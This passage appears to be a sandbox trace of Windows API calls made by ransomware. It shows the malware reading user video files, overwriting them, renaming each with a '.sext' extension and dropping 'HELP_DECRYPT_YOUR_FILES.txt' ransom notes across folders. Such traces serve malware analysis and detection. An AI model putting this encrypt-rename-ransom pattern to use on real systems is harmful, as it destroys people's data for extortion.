[0107.052] WriteFile (in: hFile=0x2e4, lpBuffer=0x231fc90*, nNumberOfBytesToWrite=0x9dd0, lpNumberOfBytesWritten=0x12e2a8, lpOverlapped=0x0 | out: lpBuffer=0x231fc90*, lpNumberOfBytesWritten=0x12e2a8*=0x9dd0, lpOverlapped=0x0) returned 1 [0107.053] CloseHandle (hObject=0x2e4) returned 1 [0107.057] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\S2X8-FkEZzZP23.mp4", nBufferLength=0x105, lpBuffer=0x12de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\S2X8-FkEZzZP23.mp4", lpFilePart=0x0) returned 0x5d [0107.057] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\S2X8-FkEZzZP23.mp4.sext", nBufferLength=0x105, lpBuffer=0x12de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\S2X8-FkEZzZP23.mp4.sext", lpFilePart=0x0) returned 0x62 [0107.057] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e280) returned 1 [0107.057] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\S2X8-FkEZzZP23.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\s2x8-fkezzzp23.mp4"), fInfoLevelId=0x0, lpFileInformation=0x12e360 | out: lpFileInformation=0x12e360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee836ee0, ftCreationTime.dwHighDateTime=0x1d5e0ae, ftLastAccessTime.dwLowDateTime=0x92553a30, ftLastAccessTime.dwHighDateTime=0x1d5e460, ftLastWriteTime.dwLowDateTime=0x8e1f34e0, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x9dd0)) returned 1 [0107.057] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e240) returned 1 [0107.057] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\S2X8-FkEZzZP23.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\s2x8-fkezzzp23.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\S2X8-FkEZzZP23.mp4.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\s2x8-fkezzzp23.mp4.sext")) returned 1 [0107.058] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\Tsn9NGG_VAkVfW_bv1g.mp4", nBufferLength=0x105, lpBuffer=0x12dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\Tsn9NGG_VAkVfW_bv1g.mp4", lpFilePart=0x0) returned 0x62 [0107.058] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e180) returned 1 [0107.058] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\Tsn9NGG_VAkVfW_bv1g.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\tsn9ngg_vakvfw_bv1g.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0107.058] GetFileType (hFile=0x2e4) returned 0x1 [0107.058] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e0f0) returned 1 [0107.058] GetFileType (hFile=0x2e4) returned 0x1 [0107.058] GetFileSize (in: hFile=0x2e4, lpFileSizeHigh=0x12e318 | out: lpFileSizeHigh=0x12e318*=0x0) returned 0x8acc [0107.058] ReadFile (in: hFile=0x2e4, lpBuffer=0x232a088, nNumberOfBytesToRead=0x8acc, lpNumberOfBytesRead=0x12e248, lpOverlapped=0x0 | out: lpBuffer=0x232a088*, lpNumberOfBytesRead=0x12e248*=0x8acc, lpOverlapped=0x0) returned 1 [0107.060] CloseHandle (hObject=0x2e4) returned 1 [0107.136] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\Tsn9NGG_VAkVfW_bv1g.mp4", nBufferLength=0x105, lpBuffer=0x12dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\Tsn9NGG_VAkVfW_bv1g.mp4", lpFilePart=0x0) returned 0x62 [0107.136] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e180) returned 1 [0107.136] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\Tsn9NGG_VAkVfW_bv1g.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\tsn9ngg_vakvfw_bv1g.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0107.137] GetFileType (hFile=0x2e4) returned 0x1 [0107.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e0f0) returned 1 [0107.137] GetFileType (hFile=0x2e4) returned 0x1 [0107.137] WriteFile (in: hFile=0x2e4, lpBuffer=0x2440e68*, nNumberOfBytesToWrite=0x8ad0, lpNumberOfBytesWritten=0x12e2a8, lpOverlapped=0x0 | out: lpBuffer=0x2440e68*, lpNumberOfBytesWritten=0x12e2a8*=0x8ad0, lpOverlapped=0x0) returned 1 [0107.139] CloseHandle (hObject=0x2e4) returned 1 [0107.140] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\Tsn9NGG_VAkVfW_bv1g.mp4", nBufferLength=0x105, lpBuffer=0x12de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\Tsn9NGG_VAkVfW_bv1g.mp4", lpFilePart=0x0) returned 0x62 [0107.141] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\Tsn9NGG_VAkVfW_bv1g.mp4.sext", nBufferLength=0x105, lpBuffer=0x12de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\Tsn9NGG_VAkVfW_bv1g.mp4.sext", lpFilePart=0x0) returned 0x67 [0107.141] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e280) returned 1 [0107.141] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\Tsn9NGG_VAkVfW_bv1g.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\tsn9ngg_vakvfw_bv1g.mp4"), fInfoLevelId=0x0, lpFileInformation=0x12e360 | out: lpFileInformation=0x12e360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60db1520, ftCreationTime.dwHighDateTime=0x1d5d7e9, ftLastAccessTime.dwLowDateTime=0x613ce940, ftLastAccessTime.dwHighDateTime=0x1d5e323, ftLastWriteTime.dwLowDateTime=0x8e2b1bc0, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x8ad0)) returned 1 [0107.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e240) returned 1 [0107.141] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\Tsn9NGG_VAkVfW_bv1g.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\tsn9ngg_vakvfw_bv1g.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\Tsn9NGG_VAkVfW_bv1g.mp4.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\tsn9ngg_vakvfw_bv1g.mp4.sext")) returned 1 [0107.142] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\UT7DVa4lIuO.mp4", nBufferLength=0x105, lpBuffer=0x12dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\UT7DVa4lIuO.mp4", lpFilePart=0x0) returned 0x5a [0107.142] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e180) returned 1 [0107.142] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\UT7DVa4lIuO.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\ut7dva4liuo.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0107.142] GetFileType (hFile=0x2e4) returned 0x1 [0107.142] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e0f0) returned 1 [0107.142] GetFileType (hFile=0x2e4) returned 0x1 [0107.142] GetFileSize (in: hFile=0x2e4, lpFileSizeHigh=0x12e318 | out: lpFileSizeHigh=0x12e318*=0x0) returned 0x111b3 [0107.143] ReadFile (in: hFile=0x2e4, lpBuffer=0x2449f68, nNumberOfBytesToRead=0x111b3, lpNumberOfBytesRead=0x12e248, lpOverlapped=0x0 | out: lpBuffer=0x2449f68*, lpNumberOfBytesRead=0x12e248*=0x111b3, lpOverlapped=0x0) returned 1 [0107.144] CloseHandle (hObject=0x2e4) returned 1 [0107.270] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\UT7DVa4lIuO.mp4", nBufferLength=0x105, lpBuffer=0x12dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\UT7DVa4lIuO.mp4", lpFilePart=0x0) returned 0x5a [0107.270] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e180) returned 1 [0107.270] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\UT7DVa4lIuO.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\ut7dva4liuo.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0107.272] GetFileType (hFile=0x2e4) returned 0x1 [0107.272] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e0f0) returned 1 [0107.272] GetFileType (hFile=0x2e4) returned 0x1 [0107.272] WriteFile (in: hFile=0x2e4, lpBuffer=0x236fd48*, nNumberOfBytesToWrite=0x111c0, lpNumberOfBytesWritten=0x12e2a8, lpOverlapped=0x0 | out: lpBuffer=0x236fd48*, lpNumberOfBytesWritten=0x12e2a8*=0x111c0, lpOverlapped=0x0) returned 1 [0107.274] CloseHandle (hObject=0x2e4) returned 1 [0107.277] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\UT7DVa4lIuO.mp4", nBufferLength=0x105, lpBuffer=0x12de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\UT7DVa4lIuO.mp4", lpFilePart=0x0) returned 0x5a [0107.277] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\UT7DVa4lIuO.mp4.sext", nBufferLength=0x105, lpBuffer=0x12de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\UT7DVa4lIuO.mp4.sext", lpFilePart=0x0) returned 0x5f [0107.277] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e280) returned 1 [0107.277] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\UT7DVa4lIuO.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\ut7dva4liuo.mp4"), fInfoLevelId=0x0, lpFileInformation=0x12e360 | out: lpFileInformation=0x12e360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc144b780, ftCreationTime.dwHighDateTime=0x1d5e7e9, ftLastAccessTime.dwLowDateTime=0xc3ffb6d0, ftLastAccessTime.dwHighDateTime=0x1d5de3b, ftLastWriteTime.dwLowDateTime=0x8e408820, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x111c0)) returned 1 [0107.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e240) returned 1 [0107.277] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\UT7DVa4lIuO.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\ut7dva4liuo.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\UT7DVa4lIuO.mp4.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\ut7dva4liuo.mp4.sext")) returned 1 [0107.278] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\HELP_DECRYPT_YOUR_FILES.txt", nBufferLength=0x105, lpBuffer=0x12dce0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\HELP_DECRYPT_YOUR_FILES.txt", lpFilePart=0x0) returned 0x66 [0107.278] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e1c0) returned 1 [0107.278] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\VGiiaMPiZ\\HELP_DECRYPT_YOUR_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\vgiiampiz\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4 [0107.279] GetFileType (hFile=0x2e4) returned 0x1 [0107.279] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e130) returned 1 [0107.279] GetFileType (hFile=0x2e4) returned 0x1 [0107.280] WriteFile (in: hFile=0x2e4, lpBuffer=0x2383ee8*, nNumberOfBytesToWrite=0x4bc, lpNumberOfBytesWritten=0x12e268, lpOverlapped=0x0 | out: lpBuffer=0x2383ee8*, lpNumberOfBytesWritten=0x12e268*=0x4bc, lpOverlapped=0x0) returned 1 [0107.281] CloseHandle (hObject=0x2e4) returned 1 [0107.282] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\HELP_DECRYPT_YOUR_FILES.txt", nBufferLength=0x105, lpBuffer=0x12ddd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\HELP_DECRYPT_YOUR_FILES.txt", lpFilePart=0x0) returned 0x5c [0107.282] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e2b0) returned 1 [0107.282] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\ETQ7i\\HELP_DECRYPT_YOUR_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\etq7i\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4 [0107.282] GetFileType (hFile=0x2e4) returned 0x1 [0107.282] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e220) returned 1 [0107.282] GetFileType (hFile=0x2e4) returned 0x1 [0107.283] WriteFile (in: hFile=0x2e4, lpBuffer=0x2387a98*, nNumberOfBytesToWrite=0x4bc, lpNumberOfBytesWritten=0x12e358, lpOverlapped=0x0 | out: lpBuffer=0x2387a98*, lpNumberOfBytesWritten=0x12e358*=0x4bc, lpOverlapped=0x0) returned 1 [0107.284] CloseHandle (hObject=0x2e4) returned 1 [0107.284] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\HELP_DECRYPT_YOUR_FILES.txt", nBufferLength=0x105, lpBuffer=0x12dec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\HELP_DECRYPT_YOUR_FILES.txt", lpFilePart=0x0) returned 0x56 [0107.284] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e3a0) returned 1 [0107.284] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HAE _NkXT9aKwYO\\HELP_DECRYPT_YOUR_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\hae _nkxt9akwyo\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4 [0107.285] GetFileType (hFile=0x2e4) returned 0x1 [0107.285] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e310) returned 1 [0107.285] GetFileType (hFile=0x2e4) returned 0x1 [0107.285] WriteFile (in: hFile=0x2e4, lpBuffer=0x238b628*, nNumberOfBytesToWrite=0x4bc, lpNumberOfBytesWritten=0x12e448, lpOverlapped=0x0 | out: lpBuffer=0x238b628*, lpNumberOfBytesWritten=0x12e448*=0x4bc, lpOverlapped=0x0) returned 1 [0107.299] CloseHandle (hObject=0x2e4) returned 1 [0107.300] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HELP_DECRYPT_YOUR_FILES.txt", nBufferLength=0x105, lpBuffer=0x12dfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HELP_DECRYPT_YOUR_FILES.txt", lpFilePart=0x0) returned 0x45 [0107.300] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e490) returned 1 [0107.300] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\HELP_DECRYPT_YOUR_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4 [0107.300] GetFileType (hFile=0x2e4) returned 0x1 [0107.300] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e400) returned 1 [0107.301] GetFileType (hFile=0x2e4) returned 0x1 [0107.301] WriteFile (in: hFile=0x2e4, lpBuffer=0x238f178*, nNumberOfBytesToWrite=0x4bc, lpNumberOfBytesWritten=0x12e538, lpOverlapped=0x0 | out: lpBuffer=0x238f178*, lpNumberOfBytesWritten=0x12e538*=0x4bc, lpOverlapped=0x0) returned 1 [0107.302] CloseHandle (hObject=0x2e4) returned 1 [0107.303] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e610) returned 1 [0107.303] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ", nBufferLength=0x105, lpBuffer=0x12e100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ", lpFilePart=0x0) returned 0x38 [0107.303] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\", nBufferLength=0x105, lpBuffer=0x12e0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\", lpFilePart=0x0) returned 0x39 [0107.303] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ\\*", lpFindFileData=0x12e2b0 | out: lpFindFileData=0x12e2b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae10c960, ftCreationTime.dwHighDateTime=0x1d5e514, ftLastAccessTime.dwLowDateTime=0x14073b80, ftLastAccessTime.dwHighDateTime=0x1d5dbcb, ftLastWriteTime.dwLowDateTime=0x14073b80, ftLastWriteTime.dwHighDateTime=0x1d5dbcb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xae39b0 [0107.303] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae10c960, ftCreationTime.dwHighDateTime=0x1d5e514, ftLastAccessTime.dwLowDateTime=0x14073b80, ftLastAccessTime.dwHighDateTime=0x1d5dbcb, ftLastWriteTime.dwLowDateTime=0x14073b80, ftLastWriteTime.dwHighDateTime=0x1d5dbcb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0107.304] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x115bda10, ftCreationTime.dwHighDateTime=0x1d5dc59, ftLastAccessTime.dwLowDateTime=0xf493aad0, ftLastAccessTime.dwHighDateTime=0x1d5e481, ftLastWriteTime.dwLowDateTime=0xf493aad0, ftLastWriteTime.dwHighDateTime=0x1d5e481, nFileSizeHigh=0x0, nFileSizeLow=0x18d0f, dwReserved0=0x0, dwReserved1=0x0, cFileName="-g3VNA.avi", cAlternateFileName="")) returned 1 [0107.304] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb898d80, ftCreationTime.dwHighDateTime=0x1d5e005, ftLastAccessTime.dwLowDateTime=0x45e1aef0, ftLastAccessTime.dwHighDateTime=0x1d5d7ad, ftLastWriteTime.dwLowDateTime=0x45e1aef0, ftLastWriteTime.dwHighDateTime=0x1d5d7ad, nFileSizeHigh=0x0, nFileSizeLow=0x10db, dwReserved0=0x0, dwReserved1=0x0, cFileName="9h7TCbmOvMAG.mkv", cAlternateFileName="9H7TCB~1.MKV")) returned 1 [0107.304] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc59200d0, ftCreationTime.dwHighDateTime=0x1d5dce1, ftLastAccessTime.dwLowDateTime=0x7a26efb0, ftLastAccessTime.dwHighDateTime=0x1d5de36, ftLastWriteTime.dwLowDateTime=0x7a26efb0, ftLastWriteTime.dwHighDateTime=0x1d5de36, nFileSizeHigh=0x0, nFileSizeLow=0x11f03, dwReserved0=0x0, dwReserved1=0x0, cFileName="Qd1 hcTvl.avi", cAlternateFileName="QD1HCT~1.AVI")) returned 1 [0107.304] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12275b90, ftCreationTime.dwHighDateTime=0x1d5e78a, ftLastAccessTime.dwLowDateTime=0xe29695b0, ftLastAccessTime.dwHighDateTime=0x1d5d8fe, ftLastWriteTime.dwLowDateTime=0xe29695b0, ftLastWriteTime.dwHighDateTime=0x1d5d8fe, nFileSizeHigh=0x0, nFileSizeLow=0x2fe1, dwReserved0=0x0, dwReserved1=0x0, cFileName="UZPmC1-FYNK.mkv", cAlternateFileName="UZPMC1~1.MKV")) returned 1 [0107.304] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0107.304] FindClose (in: hFindFile=0xae39b0 | out: hFindFile=0xae39b0) returned 1 [0107.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e560) returned 1 [0107.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e520) returned 1 [0107.305] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e610) returned 1 [0107.305] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\j-pqgTUq9vExmNB4eXJ", nBufferLength=0x105, lpBuffer=0x12e100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS 